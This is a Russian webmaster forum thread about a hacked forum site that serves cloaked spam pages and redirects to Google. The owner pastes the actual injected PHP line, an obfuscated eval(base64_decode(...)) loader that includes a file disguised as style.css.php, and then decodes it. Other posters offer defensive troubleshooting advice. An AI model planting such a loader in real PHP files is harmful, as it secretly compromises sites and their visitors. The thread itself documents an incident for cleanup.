Ссылки на ваш сайт в панели ВМ Гугла.

Сделайте так что б на сайте отдавались 404 на несуществующие страницы и будет все хорошо;)

Ой, блин.... как бы Вы не взломаны! У меня такая хрень однажды была, когда сайт подломили и в скрипты внедрили генератор подобных "левых" страниц, с которых наставили ссылок на всякие ресурсы. Заметил я это по тому, что на меня начали ссылаться итальянские дорвеи и ГСы порно-тематики, и именно на подобного вида страницы, которых отродясь не было. Посмотрите в индексе Гугла: на самом ли деле он такие страницы не видит? Уж больно симптомы похожие...

Вот в том то и дело, что он их видит...

1974 Chevrolet Monte Carlo @ forum-1c.ru - [ Перевести эту страницу ]1974 CHEVROLET MONTE CARLO. This is a 1974 chevrolet monte carlo venn that nazimova on the applauder madame of a new disservice rhinovirus in the giving ...

forum-1c.ru/index.php/?ctblk=66 - Сохранено в кэше

http://forum-1c.ru/index.php/?ctblk=66

Хотя сами страницы пустые получаются.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML><HEAD>

<META content="text/html; charset=windows-1251" http-equiv=Content-Type></HEAD>

<BODY></BODY></HTML>

Я ctblk в роботсе запретил вообще... но пока видимо до гугла не дошло.

war357159 добавил 04.12.2009 в 13:47

ПС: Что за Chevrolet Monte Carlo блин...

Подозреваю, что первые пол-года сайт висел у меня сам по себе, и на него одно время наспамили всякого... Сейчас все давно вычищено, может остатки какие остались...

Но почему ctblk? Что за мать его за ногу ctblk?

1976 Cadillac Eldorado Convertible @ forum-1c.ru 

1975 Chevrolet Camaro @ forum-1c.ru

1972 Chevrolet Truck @ forum-1c.ru

и еще куча автомобилей гр..баных присосалась к сайту... 😡

war357159 добавил 04.12.2009 в 14:00

На некоторых страницах, если нажать Сохранено в кеше происходит переброска на левые сайты... при чем у некоторых на "Озон"

404 ошибка у меня вроде должна отрабатываться... По крайней мере если на удаленный топик нажать - то выкидывает стандартную страничку с надписью "Топик удален"

Проверил Вашу эту страницу в индексе Гугла. Вот так: (поиск страницы на сайте по ключевику). Она существует для Гугла, в индексе она есть, и с нее стоит редирект на совершенно левые ресурсы.

Короче, диагноз Вам крайне неутешительный: Вас подломили. Не Вы же, в конце концов, создали страницу про Шевроле и теперь ставите на нее внешние ссылки, чтобы немного продвинуть? Причем вражий скрипт работает, он формирует страницы, которые Гугл видит, а Вы нет (это крайне просто сделать на PHP, обычный клоакинг либо по IP, либо по полю REFFERER), и на них делает то, что ему хочется - может ссылки раздает, может, просто редиректит (как мне попалось). И скорее всего, таких страниц Вам насоздают много.

Чаще такие вражеские штучки делаются на ЯваСкрипте, который и грузит с какого-нибудь бесплатного хостинга основной вредоносный скрипт к Вам на сайт. Ну, чтоб не палить источник заразы. Поэтому первым делом посмотрите коды на предмет длинных вставок на ЯваСкрипте (там применяют еще кодирование, поэтому сам фрагмент можно глазами найти). Это самый распространенный вариант. Если же сломали умнее - то найти вражий код совсем не просто: он может быть даже во флэш-файле.

Пипец... Спасибо. Буду искать... Хотя пока не представляю как (((((

Попросите кого-нибудь еще посмотреть эту ситуацию. Может, кто-то более точно подскажет, из какого места формируются такие страницы. Или хотя бы методику, как это место вычислить. Вопрос-то серьезный...

Я бы начал с осмотра тех скриптов и папок, которые имеют права "777". Вам же почти наверняка через запись с чужого сервера подлянку делают! Значит, должны быть права на запись. Только не паникуйте: если Вам еще не "подправили" базу данных (не навставляти в посты левых ссылок, что был бы "пипец" по-настоящему) - значит, это они сделать не сумели и не сумеют, и не все так плохо!

Часто хостеры помогают в таких вопросах: им тоже не по кайфу держать у себя сайт, который хрен знает, что может завтра натворить без спроса у его владельца. Причем в некоторых случаях, если инкапсуляция плохая, разворочать можно весь сервер, и все сайты там переубивать. Как правило, за деньги они быстро находят и прибивают заразу.

Завтра программист, который мне не раз помогал, сказал что поможет. Отпишу механизм удаления гадости - может кому тоже пригодится.

Сайт и правда был взломан.

Ко всем php файлам добавлено

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy91c3IvaG9tZS8xODQ3OC9mb3J1bS0xYy5ydS9odG1sL1RoZW1lcy9iYWJ5bG9uL2ltYWdlcy9iYmMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

а если по русски

eval(

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn']))

 {$GLOBALS['mfsn']='/usr/home/18478/forum-1c.ru/html/Themes/babylon/images/bbc/style.css.php';



 if(file_exists($GLOBALS['mfsn']))

  {include_once($GLOBALS['mfsn']);

    if(function_exists('gml')&&function_exists('dgobh'))

     {ob_start('dgobh');}

   }

 }

)

интересно... у меня сайт был взоман таким же образом. я перезалил неповрежденный бекап месячной давности. полсле этого на мой сайт появились ссылки с разных рессурсов при чем мой сайт ни на кого вроде не ссылается и левых страниц нет. отправил в гугл заявку на пересмотрение сайта, никаких нарушений не нашли, но ссылки в гугл веб мастер до сих пор висят

аналогичная ситуация, сайт был взломан.. произошло это следующим образом:

прогонял сайт по каталогам с помощью сервиса 1ps, проходя очередной каталог выскачил попандер а зетм открылся акробат реадер в результате чего на мой комп был автоматически закачен спиварешный модуль, в виде антивирусника (эмитировал антивирусную программу и показывал процесс сканирования), в результате с компа были сворованы все пароли от ftp и т.д. буквально спустя несколько часов на большинтве моих сайтах был размещен подобный код!

перезалил файлы сайтов, просканировал все доктервебом и малваребитес (анти-спиваре), комп подлечил сайты поправил...

так что будте бдительны!